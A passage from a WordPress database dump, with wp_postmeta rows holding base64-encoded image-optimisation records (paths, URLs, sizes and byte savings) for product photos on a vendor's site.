C9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzY0LCJpZCI6MTQ1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzNjcsImlkIjoxNDU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTM2OSwiaWQiOjE0NTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzcyLCJpZCI6MTQ1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzNzUsImlkIjoxNDU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMDIsInRpbWUiOjE0ODM1NjkzNzgsImlkIjoxNDU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MzgwLCJpZCI6MTQ1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTM4MywiaWQiOjE0NTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkzODUsImlkIjoxNDU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5Mzg4LCJpZCI6MTQ1N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1zZXZlcmUtc2VydmljZS1ncmVhc2UtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tc2V2ZXJlLXNlcnZpY2UtZ3JlYXNlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLXNldmVyZS1zZXJ2aWNlLWdyZWFzZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTM5MSwiaWQiOjE0NTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29442, 1456, 'wpfc_optimisation_reduction', '1749327'); 
INSERT INTO `wp_postmeta` VALUES (29443, 1456, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQuanBnIiwicmVkdWN0aW9uIjoxNzQ5MzEzLCJ0aW1lIjoxNDgzNTY5NDAyLCJpZCI6IjE0NTYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTQwNiwiaWQiOjE0NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NDA5LCJpZCI6MTQ1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk0MTMsImlkIjoxNDU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NDE3LCJpZCI6MTQ1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk0MjAsImlkIjoxNDU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTQyMiwiaWQiOjE0NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NDI1LCJpZCI6MTQ1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk0MjgsImlkIjoxNDU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NDMxLCJpZCI6MTQ1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTQzMywiaWQiOjE0NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk0MzYsImlkIjoxNDU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5NDM5LCJpZCI6MTQ1Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTQ0MSwiaWQiOjE0NTZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90ZWZsb24tbXVsdGktdXNlLXF1YXJ0LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdGVmbG9uLW11bHRpLXVzZS1xdWFydC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RlZmxvbi1tdWx0aS11c2UtcXVhcnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1Njk0NDQsImlkIjoxNDU2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29444, 1455, 'wpfc_optimisation_reduction', '697165'); 
